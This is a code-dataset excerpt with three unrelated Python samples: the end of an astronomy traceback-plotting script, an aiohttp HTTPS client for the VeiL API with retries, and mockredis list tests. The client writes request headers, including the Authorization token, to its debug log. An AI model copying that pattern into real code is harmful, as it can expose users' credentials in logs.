    ### of the moving group itself. This is the         ###
    ### "waterfall diagram"                             ###
    #######################################################
    fig2 = pyplot.figure(figsize=(9.6,5.4),dpi=600)
    ax2 = fig2.add_subplot(111)
    ax2.set_ylim((0,200))
    ax2.set_xlim((0,timespan))
    ax2.set_xlabel('Time (Myr)')
    ax2.set_ylabel('(pc)')
    fig2.canvas.draw()
    # A single reusable line/polygon artist is re-set and redrawn for every
    # curve, then dumped via save() -- this keeps the memory footprint low.
    line = ax2.plot([0,1],[0,1],color=(1,1,1,0.1),linewidth=1)
    line = line[0]
    poly = ax2.add_patch(patches.Polygon([[0,1],[1,2],[2,0]],closed=True,facecolor=(1,1,1,0.15), edgecolor='none'))
    #ax2.set_title('{0:} {1:} traceback'.format(mgpname,method))
    # Collect per-timestep ellipse axes (a,b,c) and centers (x,y,z).
    a = []
    b = []
    c = []
    x = []
    y = []
    z = []
    for q in range(len(times)):
        a.append(mgpmaster[q]["a"])
        b.append(mgpmaster[q]["b"])
        c.append(mgpmaster[q]["c"])
        x.append(mgpmaster[q]["x"])
        y.append(mgpmaster[q]["y"])
        z.append(mgpmaster[q]["z"])
    a = np.asarray(a)
    b = np.asarray(b)
    c = np.asarray(c)
    x = np.asarray(x)
    y = np.asarray(y)
    z = np.asarray(z)
    print a
    # Control the crowding/density of the plots. Only plot 30,000 curves regardless of how many there really are.
    if n_stars*n_int > 30000:
        p = np.asarray(np.ceil(np.random.rand(30000)*(n_stars*n_int-1)),np.int)
    else:
        p = np.arange(0,(n_stars*n_int-1),1)
    # Distance of each sampled track from the group center at every timestep.
    mgpdist = np.sqrt((mgp_x[p,:] - x)**2 + (mgp_y[p,:] - y)**2 + (mgp_z[p,:] - z)**2)
    for cntr in range(len(mgpdist)):
        line.set_data(times,mgpdist[cntr])
        line.set_linewidth(0.2)
        line.set_color((0,0,0,0.05))
        ax2.draw_artist(line)
    # Overplot the group's effective radius (geometric mean of the axes).
    line.set_data(times,(a*b*c)**(1/3.))
    line.set_color((1,0,0,0.5))
    line.set_linewidth(1)
    ax2.draw_artist(line)
    x = np.concatenate((times,times[::-1],[times[0]]))
    mgprad = (a*b*c)**(1/3.)
    mg = np.concatenate((mgprad,np.zeros_like(mgprad),[mgprad[0]]))
    poly.set_xy(zip(*(x,mg)))
    poly.set_facecolor((1,0,0,0.2))
    ax2.draw_artist(poly)
    # Shade the user-supplied age range of the moving group in blue.
    poly.set_xy(zip(*([mgpage,mgpage,mgpage2,mgpage2,mgpage],[0,500,500,0,0])))
    poly.set_facecolor((0,0,1,0.2))
    ax2.draw_artist(poly)
    save(fig2,'Trace_{0:}_{1:}.png'.format(mgpname,method))
    fig2.clf()
    pyplot.close()
if __name__ == "__main__":
if len(sys.argv) == 0:
print "tracewing_mgp.py <inputfile> <group> <method> <minage> <maxage> <maxplotage> <maxsimage>"
else:
traceback()
| StarcoderdataPython |
6473167 | # -*- coding: utf-8 -*-
"""Veil https api client."""
import asyncio
import json
import logging
from types import TracebackType
from typing import Dict, Optional, Type
from urllib.parse import urlencode
from uuid import UUID, uuid4
try:
import ujson
except ImportError: # pragma: no cover
ujson = None
try:
import aiohttp
except ImportError: # pragma: no cover
aiohttp = None
from .api_objects import (VeilCluster, VeilController, VeilDataPool,
VeilDomainExt, VeilEvent, VeilLibrary, VeilNode, VeilResourcePool,
VeilVDisk)
from .base import VeilRetryConfiguration, VeilTag, VeilTask
from .base.api_cache import VeilCacheConfiguration, cached_response
from .base.utils import (IntType, NullableDictType, VeilJwtTokenType,
VeilUrlStringType, veil_api_response)
# Library logger; NullHandler keeps the package silent unless the host
# application configures logging itself.
logger = logging.getLogger('veil-api-client.request')
logger.addHandler(logging.NullHandler())
class _RequestContext:
    """Custom aiohttp.RequestContext class for request retry logic.

    Attributes:
        request: aiohttp.request operation (POST, GET, etc).
        url: request url
        num_of_attempts: num of retry attempts if request failed.
        timeout: base try timeout time (with exponential grow).
        max_timeout: max timeout between tries.
        timeout_increase_step: timeout increase step.
        status_codes: collection of response status codes which must be repeated.
        exceptions: collection of aiohttp exceptions which must be repeated.
        kwargs: additional aiohttp.request arguments, such as headers and etc.
    """

    def __init__(self,
                 request: aiohttp.ClientRequest,
                 url: str,
                 num_of_attempts: int,
                 timeout: int,
                 max_timeout: int,
                 timeout_increase_step: int,
                 status_codes: set,
                 exceptions: set,
                 **kwargs
                 ) -> None:
        """Please see help(_RequestContext) for more info."""
        self._request = request
        self._url = url
        self._num_of_attempts = num_of_attempts
        self._timeout = timeout
        self._max_timeout = max_timeout
        self._timeout_increase_step = timeout_increase_step
        # Normalize None to empty collections so membership tests are safe.
        if status_codes is None:
            status_codes = set()
        self._status_codes = status_codes
        if exceptions is None:
            exceptions = set()
        self._exceptions = exceptions
        self._kwargs = kwargs
        # Mutable retry state: attempt counter and the last received response.
        self._current_attempt = 0
        self._response = None

    @property
    def _exp_timeout(self) -> float:
        """Retry request timeout which can exponentially grow."""
        timeout = self._timeout * (self._timeout_increase_step ** (self._current_attempt - 1))
        return min(timeout, self._max_timeout)

    def _bad_code(self, code: int) -> bool:
        """Check that request status_code is bad (5xx or user-listed)."""
        return 500 <= code <= 599 or code in self._status_codes

    async def _execute_request(self) -> aiohttp.ClientResponse:
        """Run client request on aiohttp, retrying recursively on failure."""
        try:
            self._current_attempt += 1
            if self._current_attempt > 1:
                logger.debug('Request %s attempt', self._current_attempt)
            response = await self._request(self._url, **self._kwargs)
            code = response.status
            # Retry on a bad status code while attempts remain.
            # NOTE(review): responses from failed attempts are not explicitly
            # closed here; only the final response is closed in __aexit__ --
            # confirm aiohttp connection reuse is acceptable here.
            if self._current_attempt < self._num_of_attempts and self._bad_code(code):
                await asyncio.sleep(self._exp_timeout)
                return await self._execute_request()
            self._response = response
            return response
        except Exception as e:
            # Retry only exceptions the caller listed; otherwise re-raise.
            if self._current_attempt < self._num_of_attempts:
                for exc in self._exceptions:
                    if isinstance(e, exc):
                        await asyncio.sleep(self._exp_timeout)
                        return await self._execute_request()
            raise e

    async def __aenter__(self) -> aiohttp.ClientResponse:
        return await self._execute_request()

    async def __aexit__(self, exc_type, exc_val, exc_tb) -> None:
        # Close the last response (if any) when leaving the context.
        if self._response is not None:
            if not self._response.closed:
                self._response.close()
class VeilClient:
    """VeilClient class.

    Private attributes:
        __AUTH_HEADER_KEY: Header authorization key.
        __USER_AGENT_VAL: Header user-agent value.
        __TRANSFER_PROTOCOL_PREFIX: force to use only HTTPS.

    Attributes:
        server_address: VeiL server address (without protocol).
        token: VeiL auth token.
        ssl_enabled: ssl-certificate validation.
        session_reopen: auto reopen aiohttp.ClientSession when it`s closed.
        timeout: aiohttp.ClientSession total timeout.
        extra_headers: additional user headers.
        extra_params: additional user params.
        cookies: additional user cookies (probably useless).
        ujson_: ujson using instead of default aiohttp.ClientSession serializer.
        retry_opts: VeilRetryConfiguration instance.
        cache_opts: VeilCacheConfiguration instance.
        url_max_length: maximum url length (protocol + domain + query params)
    """

    __TRANSFER_PROTOCOL_PREFIX = 'https://'
    __AUTH_HEADER_KEY = 'Authorization'
    __USER_AGENT_VAL = 'veil-api-client/2.2'
    __IDEMPOTENCY_BODY_KEY = 'idempotency_key'

    # Descriptor-validated attributes (see base.utils type descriptors).
    __extra_headers = NullableDictType('__extra_headers')
    __extra_params = NullableDictType('__extra_params')
    __cookies = NullableDictType('__cookies')

    server_address = VeilUrlStringType('server_address')
    token = VeilJwtTokenType('token')

    def __init__(self, server_address: str,
                 token: str,
                 ssl_enabled: bool = True,
                 session_reopen: bool = False,
                 timeout: int = 5 * 60,
                 extra_headers: Optional[dict] = None,
                 extra_params: Optional[dict] = None,
                 cookies: Optional[dict] = None,
                 ujson_: bool = True,
                 retry_opts: Optional[VeilRetryConfiguration] = None,
                 cache_opts: Optional[VeilCacheConfiguration] = None,
                 url_max_length: Optional[int] = None,
                 ) -> None:
        """Please see help(VeilClient) for more info."""
        # Optional dependencies are imported at module level; fail fast here.
        if aiohttp is None:
            raise RuntimeError('Please install `aiohttp`')  # pragma: no cover
        if ujson is None and ujson_:
            raise RuntimeError('Please install `ujson`')  # pragma: no cover
        self.server_address = server_address
        self.token = token
        self.__session_reopen = session_reopen
        self.__ssl_enabled = ssl_enabled
        self.__extra_headers = extra_headers
        self.__extra_params = extra_params
        __timeout = aiohttp.ClientTimeout(total=timeout)
        self.__timeout = __timeout
        self.__cookies = cookies
        # ujson is much faster but less compatible
        self.__json_serialize = ujson.dumps if ujson_ else json.dumps
        if not retry_opts:
            retry_opts = VeilRetryConfiguration()
        self.__retry_opts = retry_opts
        # cache options that can be used in request caching decorator
        if not cache_opts:
            cache_opts = VeilCacheConfiguration(cache_client=None, ttl=0)
        self.__cache_opts = cache_opts
        self.__url_max_length = url_max_length
        self.__client_session = self.new_client_session

    async def __aenter__(self) -> 'VeilClient':
        """Async context manager enter."""
        return self

    async def __aexit__(self,
                        exc_type: Optional[Type[BaseException]],
                        exc_val: Optional[BaseException],
                        exc_tb: Optional[TracebackType]) -> None:
        """Async context manager exit."""
        await self.__session.close()

    async def close(self) -> None:
        """Session close."""
        await self.__session.close()

    @property
    def new_client_session(self) -> 'aiohttp.ClientSession':
        """Return new ClientSession instance."""
        # TODO: DeprecationWarning: The object should be created from async function
        return aiohttp.ClientSession(timeout=self.__timeout, cookies=self.__cookies,
                                     json_serialize=self.__json_serialize)

    @property
    def base_url(self) -> str:
        """Build controller api url (always HTTPS)."""
        return ''.join([self.__TRANSFER_PROTOCOL_PREFIX, self.server_address, '/api/'])

    @property
    def __base_params(self) -> Dict[str, int]:
        """All requests to VeiL should be async by default."""
        return {'async': 1}

    @property
    def __params(self) -> Dict:
        """Return base params extended by user extra params."""
        params = self.__base_params
        if self.__extra_params and isinstance(self.__extra_params, dict):
            params.update(self.__extra_params)
        return params

    @property
    def __base_headers(self) -> Dict[str, str]:
        """Return preconfigured request headers.

        Note:
            response should be json encoded on utf-8 and EN locale.
        """
        headers_dict = {
            'Content-Type': 'application/json',
            'Accept': 'application/json',
            'Accept-Charset': 'utf-8',
            'User-Agent': self.__USER_AGENT_VAL,
            'Connection': 'keep-alive',
            'Cache-Control': 'max-age=0',
            'Accept-Language': 'en',
            self.__AUTH_HEADER_KEY: '{}'.format(self.token),
        }
        return headers_dict

    @property
    def __headers(self) -> Dict[str, str]:
        """Return base_headers extended by user extra_headers."""
        headers = self.__base_headers
        if self.__extra_headers and isinstance(self.__extra_headers, dict):
            headers.update(self.__extra_headers)
        return headers

    @property
    def __session(self) -> 'aiohttp.ClientSession':
        """Return connection ClientSession, reopening it if configured to."""
        if self.__client_session.closed and self.__session_reopen:
            self.__client_session = self.new_client_session
        return self.__client_session

    def __request_context(self,
                          request: aiohttp.ClientRequest,
                          url: str,
                          headers: dict,
                          params: dict,
                          ssl: bool,
                          retry_opts: VeilRetryConfiguration,
                          json_data: Optional[dict] = None):
        """Create new _RequestContext instance."""
        # protocol + domain + query args
        if self.__url_max_length:
            full_url = '{url}?{params}'.format(url=url, params=urlencode(params))
            if len(full_url) > self.__url_max_length:
                raise AssertionError('The maximum url length is set and exceeded.')
        # User-friendly magic - convert all UUID values to a str
        if isinstance(json_data, dict):
            for key, value in json_data.items():
                try:
                    if isinstance(value, UUID):
                        logger.warning('JSON can`t contain a UUID -> converting %s to a str',
                                       value)
                        json_data[key] = str(value)
                # NOTE(review): neither isinstance nor str(UUID) raises
                # ValueError here, so this handler looks dead/defensive --
                # confirm before removing.
                except ValueError:
                    json_data[key] = value
        return _RequestContext(request=request, url=url, headers=headers, params=params,
                               ssl=ssl, json=json_data,
                               num_of_attempts=retry_opts.num_of_attempts,
                               timeout=retry_opts.timeout,
                               max_timeout=retry_opts.max_timeout,
                               timeout_increase_step=retry_opts.timeout_increase_step,
                               status_codes=retry_opts.status_codes,
                               exceptions=retry_opts.exceptions)

    @staticmethod
    async def __fetch_response_data(response: aiohttp.ClientResponse) -> Dict[str, str]:
        """Collect all response attributes into a plain dict."""
        if isinstance(response, aiohttp.ClientResponse):
            # Collect response data
            async with response:
                status_code = response.status
                headers = response.headers
                # If VeiL ECP is not fully turned on, the responses may be of the wrong type
                try:
                    data = await response.json()
                except aiohttp.ContentTypeError:
                    logger.debug('VeiL response has wrong content type.')
                    data = dict()
            return dict(status_code=status_code, headers=dict(headers), data=data)

    async def __api_retry_request(self, method_name: str,
                                  url: str,
                                  headers: dict,
                                  params: dict,
                                  ssl: bool,
                                  json_data: Optional[dict] = None,
                                  retry_opts: Optional[VeilRetryConfiguration] = None) -> Dict[str, str]:  # noqa: E501
        """Log parameters and execute passed aiohttp method with retry options."""
        # VeiL can`t decode requests which contain extra commas
        # NOTE(review): value[-1] raises IndexError on an empty string value --
        # confirm params never contain empty strings.
        for argument, value in params.items():
            if isinstance(value, str) and value[-1] == ',':
                params[argument] = value[:-1]
        # If request retry_opts are not defined - use Class attr value.
        if not retry_opts:
            retry_opts = self.__retry_opts
        # log request
        logger.debug('ssl: %s, url: %s, header: %s, params: %s, json: %s', self.__ssl_enabled,
                     url, self.__headers, params, json_data)
        # determine aiohttp.client method to call
        aiohttp_request_method = getattr(self.__session, method_name)
        # create aiohttp.request which can be retried.
        aiohttp_request = self.__request_context(request=aiohttp_request_method,
                                                 url=url,
                                                 headers=headers,
                                                 params=params,
                                                 ssl=ssl,
                                                 json_data=json_data,
                                                 retry_opts=retry_opts)
        # execute request and fetch response data
        async with aiohttp_request as aiohttp_response:
            return await self.__fetch_response_data(aiohttp_response)

    @veil_api_response
    @cached_response
    async def api_request(self,
                          method_name: str,
                          url: str,
                          headers: dict,
                          params: dict,
                          ssl: bool,
                          json_data: Optional[dict] = None,
                          retry_opts: Optional[VeilRetryConfiguration] = None
                          ):
        """Api_retry interface.

        Note:
            Override me to extend standard behaviour.
        """
        return await self.__api_retry_request(method_name=method_name,
                                              url=url,
                                              headers=headers,
                                              params=params,
                                              ssl=ssl,
                                              json_data=json_data,
                                              retry_opts=retry_opts)

    async def get(self, api_object, url: str,
                  extra_params: Optional[dict] = None,
                  extra_headers: Optional[dict] = None,
                  retry_opts: Optional[VeilRetryConfiguration] = None,
                  cache_opts: Optional[VeilCacheConfiguration] = None) -> Dict[str, str]:
        """Send GET request to VeiL ECP."""
        params = self.__params
        if extra_params:
            params.update(extra_params)
        headers = self.__headers
        if extra_headers:
            headers.update(extra_headers)
        if not cache_opts:
            cache_opts = self.__cache_opts
        logger.debug('%s GET request.', api_object.__class__.__name__)
        return await self.api_request(api_object=api_object,
                                      method_name='get',
                                      url=url,
                                      headers=headers,
                                      params=params,
                                      ssl=self.__ssl_enabled,
                                      retry_opts=retry_opts,
                                      cache_opts=cache_opts)

    async def post(self, api_object,
                   url: str,
                   json_data: Optional[dict] = None,
                   extra_params: Optional[dict] = None,
                   retry_opts: Optional[VeilRetryConfiguration] = None,
                   cache_opts: Optional[VeilCacheConfiguration] = None) -> Dict[str, str]:
        """Send POST request to VeiL ECP."""
        # Each POST body carries a unique idempotency key so the controller
        # can deduplicate retried requests.
        if isinstance(json_data, dict):
            json_data[self.__IDEMPOTENCY_BODY_KEY] = '{}'.format(uuid4())
        params = self.__params
        if extra_params:
            params.update(extra_params)
        if not cache_opts:
            cache_opts = self.__cache_opts
        logger.debug('%s POST request.', api_object.__class__.__name__)
        return await self.api_request(api_object=api_object,
                                      method_name='post', url=url,
                                      headers=self.__headers,
                                      params=params,
                                      ssl=self.__ssl_enabled,
                                      json_data=json_data,
                                      retry_opts=retry_opts,
                                      cache_opts=cache_opts)

    async def put(self, api_object,
                  url: str,
                  json_data: Optional[dict] = None,
                  extra_params: Optional[dict] = None,
                  retry_opts: Optional[VeilRetryConfiguration] = None,
                  cache_opts: Optional[VeilCacheConfiguration] = None) -> Dict[str, str]:
        """Send PUT request to VeiL ECP."""
        params = self.__params
        if extra_params:
            params.update(extra_params)
        if not cache_opts:
            cache_opts = self.__cache_opts
        logger.debug('%s PUT request.', api_object.__class__.__name__)
        return await self.api_request(api_object=api_object,
                                      method_name='put',
                                      url=url,
                                      headers=self.__headers,
                                      params=params,
                                      ssl=self.__ssl_enabled,
                                      json_data=json_data,
                                      retry_opts=retry_opts,
                                      cache_opts=cache_opts)

    # --- Entity factories: each returns an API-object wrapper bound to this
    # client; kwargs narrow the scope of list operations. ---

    def domain(self,
               domain_id: Optional[str] = None,
               resource_pool: Optional[str] = None,
               cluster_id: Optional[str] = None,
               node_id: Optional[str] = None,
               data_pool_id: Optional[str] = None,
               template: Optional[bool] = None,
               retry_opts: Optional[VeilRetryConfiguration] = None,
               cache_opts: Optional[VeilCacheConfiguration] = None) -> 'VeilDomainExt':
        """Return VeilDomainV entity."""
        return VeilDomainExt(client=self,
                             template=template,
                             api_object_id=domain_id,
                             resource_pool=resource_pool,
                             cluster_id=cluster_id,
                             node_id=node_id,
                             data_pool_id=data_pool_id,
                             retry_opts=retry_opts,
                             cache_opts=cache_opts)

    def controller(self, controller_id: Optional[str] = None,
                   retry_opts: Optional[VeilRetryConfiguration] = None,
                   cache_opts: Optional[VeilCacheConfiguration] = None) -> 'VeilController':
        """Return VeilController entity."""
        return VeilController(client=self, api_object_id=controller_id,
                              retry_opts=retry_opts,
                              cache_opts=cache_opts)

    def resource_pool(self, resource_pool_id: Optional[str] = None,
                      node_id: Optional[str] = None,
                      cluster_id: Optional[str] = None,
                      retry_opts: Optional[VeilRetryConfiguration] = None,
                      cache_opts: Optional[VeilCacheConfiguration] = None) -> 'VeilResourcePool':  # noqa: E501
        """Return VeilResourcePool entity."""
        return VeilResourcePool(client=self,
                                api_object_id=resource_pool_id,
                                node_id=node_id,
                                cluster_id=cluster_id,
                                retry_opts=retry_opts,
                                cache_opts=cache_opts)

    def cluster(self, cluster_id: Optional[str] = None,
                retry_opts: Optional[VeilRetryConfiguration] = None,
                cache_opts: Optional[VeilCacheConfiguration] = None) -> 'VeilCluster':
        """Return VeilCluster entity."""
        return VeilCluster(client=self, api_object_id=cluster_id,
                           retry_opts=retry_opts,
                           cache_opts=cache_opts)

    def data_pool(self, data_pool_id: Optional[str] = None,
                  node_id: Optional[str] = None,
                  cluster_id: Optional[str] = None,
                  resource_pool_id: Optional[str] = None,
                  retry_opts: Optional[VeilRetryConfiguration] = None,
                  cache_opts: Optional[VeilCacheConfiguration] = None) -> 'VeilDataPool':
        """Return VeilDataPool entity."""
        return VeilDataPool(client=self,
                            api_object_id=data_pool_id,
                            node_id=node_id,
                            cluster_id=cluster_id,
                            resource_pool_id=resource_pool_id,
                            retry_opts=retry_opts,
                            cache_opts=cache_opts)

    def node(self, node_id: Optional[str] = None,
             cluster_id: Optional[str] = None,
             resource_pool_id: Optional[str] = None,
             retry_opts: Optional[VeilRetryConfiguration] = None,
             cache_opts: Optional[VeilCacheConfiguration] = None) -> 'VeilNode':
        """Return VeilNode entity."""
        return VeilNode(client=self,
                        api_object_id=node_id,
                        cluster_id=cluster_id,
                        resource_pool_id=resource_pool_id,
                        retry_opts=retry_opts,
                        cache_opts=cache_opts)

    def vdisk(self, vdisk_id: Optional[str] = None,
              retry_opts: Optional[VeilRetryConfiguration] = None,
              cache_opts: Optional[VeilCacheConfiguration] = None) -> 'VeilVDisk':
        """Return VeilVDisk entity."""
        return VeilVDisk(client=self, api_object_id=vdisk_id,
                         retry_opts=retry_opts,
                         cache_opts=cache_opts)

    def task(self, task_id: Optional[str] = None,
             retry_opts: Optional[VeilRetryConfiguration] = None,
             cache_opts: Optional[VeilCacheConfiguration] = None) -> 'VeilTask':
        """Return VeilTask entity."""
        return VeilTask(client=self, api_object_id=task_id,
                        retry_opts=retry_opts,
                        cache_opts=cache_opts)

    def tag(self, tag_id: Optional[str] = None,
            retry_opts: Optional[VeilRetryConfiguration] = None,
            cache_opts: Optional[VeilCacheConfiguration] = None) -> 'VeilTag':
        """Return VeilTag entity."""
        return VeilTag(client=self, api_object_id=tag_id,
                       retry_opts=retry_opts,
                       cache_opts=cache_opts)

    def library(self, library_id: Optional[str] = None,
                retry_opts: Optional[VeilRetryConfiguration] = None,
                cache_opts: Optional[VeilCacheConfiguration] = None) -> 'VeilLibrary':
        """Return VeilLibrary entity."""
        return VeilLibrary(client=self, api_object_id=library_id,
                           retry_opts=retry_opts,
                           cache_opts=cache_opts)

    def event(self, event_id: Optional[str] = None,
              retry_opts: Optional[VeilRetryConfiguration] = None,
              cache_opts: Optional[VeilCacheConfiguration] = None) -> 'VeilEvent':  # noqa: E501
        """Return VeilEvent entity."""
        return VeilEvent(client=self,
                         api_object_id=event_id,
                         retry_opts=retry_opts,
                         cache_opts=cache_opts)
class VeilClientSingleton:
    """Contains previously initialized clients to minimize sessions on the VeiL controller.

    If you have always running application, such as Tornado web-server and you need to
    persistent VeiL ECP connections.
    """

    # Class-level registry of server_address -> VeilClient, shared by every
    # VeilClientSingleton instance (defined at class scope, never rebound
    # per instance).
    __client_instances = dict()
    __TIMEOUT = IntType('__TIMEOUT')

    def __init__(self, timeout: int = 5 * 60,
                 cache_opts: Optional[VeilCacheConfiguration] = None,
                 retry_opts: Optional[VeilRetryConfiguration] = None,
                 url_max_length: Optional[int] = None) -> None:
        """Please see help(VeilClientSingleton) for more info."""
        # Per-instance defaults applied when add_client() args are omitted.
        self.__TIMEOUT = timeout
        self.__CACHE_OPTS = cache_opts
        self.__RETRY_OPTS = retry_opts
        self.__URL_MAX_LENGTH = url_max_length

    def add_client(self, server_address: str, token: str,
                   timeout: Optional[int] = None,
                   cache_opts: Optional[VeilCacheConfiguration] = None,
                   retry_opts: Optional[VeilRetryConfiguration] = None,
                   url_max_length: Optional[int] = None) -> 'VeilClient':
        """Create new instance of VeilClient if it is not initialized on same address.

        Attributes:
            server_address: VeiL server address (without protocol).
            token: VeiL auth token.
            timeout: aiohttp.ClientSession total timeout.
        """
        # Fall back to the defaults captured at construction time.
        if not timeout:
            timeout = self.__TIMEOUT
        if not cache_opts:
            cache_opts = self.__CACHE_OPTS
        if not retry_opts:
            retry_opts = self.__RETRY_OPTS
        if not url_max_length:
            url_max_length = self.__URL_MAX_LENGTH
        # create a new client if not exist before.
        if server_address not in self.__client_instances:
            instance = VeilClient(server_address=server_address, token=token,
                                  session_reopen=True,
                                  timeout=timeout,
                                  ujson_=True,
                                  cache_opts=cache_opts,
                                  retry_opts=retry_opts,
                                  url_max_length=url_max_length)
            self.__client_instances[server_address] = instance
        return self.__client_instances[server_address]

    async def remove_client(self, server_address: str) -> None:
        """Remove and close existing VeilClient instance."""
        if server_address in self.__client_instances:
            _client = self.__client_instances.pop(server_address)
            await _client.close()

    @property
    def instances(self) -> dict:
        """Show all instances of VeilClient."""
        return self.__client_instances
| StarcoderdataPython |
9648633 | <gh_stars>100-1000
from contextlib import contextmanager
import time
from nose.tools import assert_less, assert_raises, eq_
from mockredis.tests.fixtures import setup, teardown
from mockredis.tests.test_constants import (
LIST1, LIST2, VAL1, VAL2, VAL3, VAL4,
bLIST1, bVAL1, bVAL2, bVAL3, bVAL4,
)
@contextmanager
def assert_elapsed_time(expected=1.0, delta=2.0):
    """
    Context manager asserting that the wrapped work takes at least
    `expected` seconds and finishes within `expected + delta` seconds.
    """
    started = time.time()
    yield
    elapsed = time.time() - started
    assert_less(expected, elapsed)
    assert_less(elapsed, expected + delta)
class TestRedisList(object):
    """Tests for mockredis' list commands (lpush/rpush, lpop/rpop, lrange,
    lrem, ltrim, sort, lset, and the blocking variants).

    The `setup`/`teardown` fixture helpers populate `self.redis` with a
    fresh mock client for every test.
    """
    def setup(self):
        # Delegates to the shared fixture helper imported at module level.
        setup(self)
    def teardown(self):
        teardown(self)
    def test_initially_empty(self):
        """
        List is created empty.
        """
        eq_(0, len(self.redis.lrange(LIST1, 0, -1)))
    def test_llen(self):
        eq_(0, self.redis.llen(LIST1))
        self.redis.lpush(LIST1, VAL1, VAL2)
        eq_(2, self.redis.llen(LIST1))
        self.redis.lpop(LIST1)
        eq_(1, self.redis.llen(LIST1))
        self.redis.lpop(LIST1)
        eq_(0, self.redis.llen(LIST1))
    def test_lindex(self):
        # Indexing a missing key returns None and does not create the key.
        eq_(None, self.redis.lindex(LIST1, 0))
        eq_(False, self.redis.exists(LIST1))
        self.redis.rpush(LIST1, VAL1, VAL2)
        eq_(bVAL1, self.redis.lindex(LIST1, 0))
        eq_(bVAL2, self.redis.lindex(LIST1, 1))
        eq_(None, self.redis.lindex(LIST1, 2))
        # Negative indices count from the tail, like real redis.
        eq_(bVAL2, self.redis.lindex(LIST1, -1))
        eq_(bVAL1, self.redis.lindex(LIST1, -2))
        eq_(None, self.redis.lindex(LIST1, -3))
        self.redis.lpop(LIST1)
        eq_(bVAL2, self.redis.lindex(LIST1, 0))
        eq_(None, self.redis.lindex(LIST1, 1))
    def test_lpop(self):
        self.redis.rpush(LIST1, VAL1, VAL2)
        eq_(bVAL1, self.redis.lpop(LIST1))
        eq_(1, len(self.redis.lrange(LIST1, 0, -1)))
        eq_(bVAL2, self.redis.lpop(LIST1))
        eq_(0, len(self.redis.lrange(LIST1, 0, -1)))
        eq_(None, self.redis.lpop(LIST1))
        # Popping the last element removes the key entirely.
        eq_([], self.redis.keys("*"))
    def test_blpop(self):
        self.redis.rpush(LIST1, VAL1, VAL2)
        eq_((bLIST1, bVAL1), self.redis.blpop((LIST1, LIST2)))
        eq_(1, len(self.redis.lrange(LIST1, 0, -1)))
        eq_((bLIST1, bVAL2), self.redis.blpop(LIST1))
        eq_(0, len(self.redis.lrange(LIST1, 0, -1)))
        timeout = 1
        # On an empty list, blpop must block for ~`timeout` seconds and
        # then return None.
        with assert_elapsed_time(expected=timeout):
            eq_(None, self.redis.blpop(LIST1, timeout))
    def test_lpush(self):
        """
        Insertion maintains order but not uniqueness.
        """
        # lpush two values
        eq_(1, self.redis.lpush(LIST1, VAL1))
        eq_(2, self.redis.lpush(LIST1, VAL2))
        # validate insertion
        eq_(b"list", self.redis.type(LIST1))
        eq_([bVAL2, bVAL1], self.redis.lrange(LIST1, 0, -1))
        # insert two more values with one repeated
        eq_(4, self.redis.lpush(LIST1, VAL1, VAL3))
        # validate the update
        eq_(b"list", self.redis.type(LIST1))
        eq_([bVAL3, bVAL1, bVAL2, bVAL1],
            self.redis.lrange(LIST1, 0, -1))
    def test_rpop(self):
        self.redis.rpush(LIST1, VAL1, VAL2)
        eq_(bVAL2, self.redis.rpop(LIST1))
        eq_(1, len(self.redis.lrange(LIST1, 0, -1)))
        eq_(bVAL1, self.redis.rpop(LIST1))
        eq_(0, len(self.redis.lrange(LIST1, 0, -1)))
        eq_(None, self.redis.rpop(LIST1))
        eq_([], self.redis.keys("*"))
    def test_brpop(self):
        self.redis.rpush(LIST1, VAL1, VAL2)
        eq_((bLIST1, bVAL2), self.redis.brpop((LIST2, LIST1)))
        eq_(1, len(self.redis.lrange(LIST1, 0, -1)))
        eq_((bLIST1, bVAL1), self.redis.brpop(LIST1))
        eq_(0, len(self.redis.lrange(LIST1, 0, -1)))
        timeout = 1
        with assert_elapsed_time(expected=timeout):
            eq_(None, self.redis.brpop(LIST1, timeout))
        eq_([], self.redis.keys("*"))
    def test_rpush(self):
        """
        Insertion maintains order but not uniqueness.
        """
        # rpush two values
        eq_(1, self.redis.rpush(LIST1, VAL1))
        eq_(2, self.redis.rpush(LIST1, VAL2))
        # validate insertion
        eq_(b"list", self.redis.type(LIST1))
        eq_([bVAL1, bVAL2], self.redis.lrange(LIST1, 0, -1))
        # insert two more values with one repeated
        eq_(4, self.redis.rpush(LIST1, VAL1, VAL3))
        # validate the update
        eq_(b"list", self.redis.type(LIST1))
        eq_([bVAL1, bVAL2, bVAL1, bVAL3],
            self.redis.lrange(LIST1, 0, -1))
    def test_lrem(self):
        # lrem count semantics: 0 removes all occurrences, a positive count
        # removes from the head, a negative count removes from the tail.
        self.redis.rpush(LIST1, VAL1, VAL2, VAL1, VAL3, VAL4, VAL2)
        eq_(2, self.redis.lrem(LIST1, VAL1, 0))
        eq_([bVAL2, bVAL3, bVAL4, bVAL2],
            self.redis.lrange(LIST1, 0, -1))
        del self.redis[LIST1]
        self.redis.rpush(LIST1, VAL1, VAL2, VAL1, VAL3, VAL4, VAL2)
        eq_(1, self.redis.lrem(LIST1, VAL2, 1))
        eq_([bVAL1, bVAL1, bVAL3, bVAL4, bVAL2],
            self.redis.lrange(LIST1, 0, -1))
        del self.redis[LIST1]
        self.redis.rpush(LIST1, VAL1, VAL2, VAL1, VAL3, VAL4, VAL2)
        eq_(2, self.redis.lrem(LIST1, VAL1, 100))
        eq_([bVAL2, bVAL3, bVAL4, bVAL2],
            self.redis.lrange(LIST1, 0, -1))
        del self.redis[LIST1]
        self.redis.rpush(LIST1, VAL1, VAL2, VAL1, VAL3, VAL4, VAL2)
        eq_(1, self.redis.lrem(LIST1, VAL3, -1))
        eq_([bVAL1, bVAL2, bVAL1, bVAL4, bVAL2],
            self.redis.lrange(LIST1, 0, -1))
        del self.redis[LIST1]
        self.redis.rpush(LIST1, VAL1, VAL2, VAL1, VAL3, VAL4, VAL2)
        eq_(1, self.redis.lrem(LIST1, VAL2, -1))
        eq_([bVAL1, bVAL2, bVAL1, bVAL3, bVAL4],
            self.redis.lrange(LIST1, 0, -1))
        del self.redis[LIST1]
        self.redis.rpush(LIST1, VAL1, VAL2, VAL1, VAL3, VAL4, VAL2)
        eq_(2, self.redis.lrem(LIST1, VAL2, -2))
        eq_([bVAL1, bVAL1, bVAL3, bVAL4],
            self.redis.lrange(LIST1, 0, -1))
        # string conversion
        self.redis.rpush(1, 1, "2", 3)
        eq_(1, self.redis.lrem(1, "1"))
        eq_(1, self.redis.lrem("1", 2))
        eq_([b"3"], self.redis.lrange(1, 0, -1))
        del self.redis["1"]
        del self.redis[LIST1]
        self.redis.rpush(LIST1, VAL1)
        eq_(1, self.redis.lrem(LIST1, VAL1))
